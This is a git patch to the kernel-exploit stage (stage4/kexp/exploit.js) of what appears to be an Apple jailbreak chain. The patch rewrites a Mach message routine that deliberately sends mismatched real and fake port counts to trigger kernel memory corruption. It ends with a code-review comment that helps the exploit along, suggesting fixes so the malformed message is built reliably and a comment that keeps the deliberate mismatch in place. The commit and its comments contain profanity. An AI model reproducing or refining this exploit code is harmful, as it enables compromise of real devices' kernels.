From 7a206940e14b0d269744bd598be075e33ef19aea Mon Sep 17 00:00:00 2001
From: spv420
Date: Mon, 1 Aug 2022 13:45:45 -0400
Subject: fuck
---
 src/stage4/kexp/exploit.js | 43 ++++++++++++++++++++++++------------------
 1 file changed, 24 insertions(+), 19 deletions(-)
(limited to 'src/stage4/kexp')
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8103639..327c813 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -277,28 +277,33 @@ function release_port_ptrs(port) {
 
 function r3gister(task, init_port_set, real_count, fake_count) {
 var mess = shit_heap(0x1000);
-// var InP = mess;
-// var OutP = mess;
-
- var InP = new Request(1, mess);
- var OutP = new Reply(1, mess);
-
- write_u32(InP + 0x18, 1);
- write_u32(InP + 0x1c, init_port_set);
- write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
- write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
- write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
- write_u32(InP + 0x30, fake_count);
- write_u32(InP + 0x0, 0x80001513);
- write_u32(InP + 0x8, task);
- write_u32(InP + 0xc, mig_get_reply_port());
- write_u32(InP + 0x14, 3403);
-
- var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ var InP_ptr = mess;
+ var OutP = mess;
+
+ var InP = new Request_r3(1, mess);
+ var InP_obj = InP.deref();
+
+ InP_obj.msgh_body.msgh_descriptor_count = 1;
+ InP_obj.init_port_set.address = init_port_set;
+ InP_obj.init_port_set.count = real_count;
+ InP_obj.init_port_set.disposition = 19;
+ InP_obj.init_port_set.deallocate = false;
+ InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8);
+ InP_obj.init_port_setCnt = fake_count;
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = task;
+ InP_obj.Head.msgh_local_port = mig_get_reply_port();
+ InP_obj.Head.msgh_id = 3403;
+
+ InP.write(InP_obj);
+
+ var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
 
 if (ret == KERN_SUCCESS) {
+ // i'm not making a fucking class for this shit
 ret = read_u32(OutP + 0x24);
 }
+
 return ret;
 }
--
cgit v1.2.3
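Review bot: The OOL ports descriptor's copy option is never written on the new side: the removed code stored the whole flags word with `write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)))`, which left the copy byte at 0, whereas the new lines set `deallocate`, `disposition` and `type` individually and leave `init_port_set.copy` holding whatever `InP.deref()` read back from the `shit_heap(0x1000)` buffer, so if that allocation is not zero-filled the kernel sees a stale copy option. Add `InP_obj.init_port_set.copy = 0;` (MACH_MSG_PHYSICAL_COPY) next to the `deallocate` line so the descriptor is fully specified as before. `var InP_ptr = mess;` is assigned but never read (the address handed to `mach_msg` is `InP.addy`), so it should be dropped. The disagreement between `init_port_set.count = real_count` and `init_port_setCnt = fake_count` is presumably the point of this request; a comment such as `// descriptor count (real_count) and init_port_setCnt (fake_count) deliberately disagree` would stop a later reader from "fixing" it. r3gister is fully contained in this hunk.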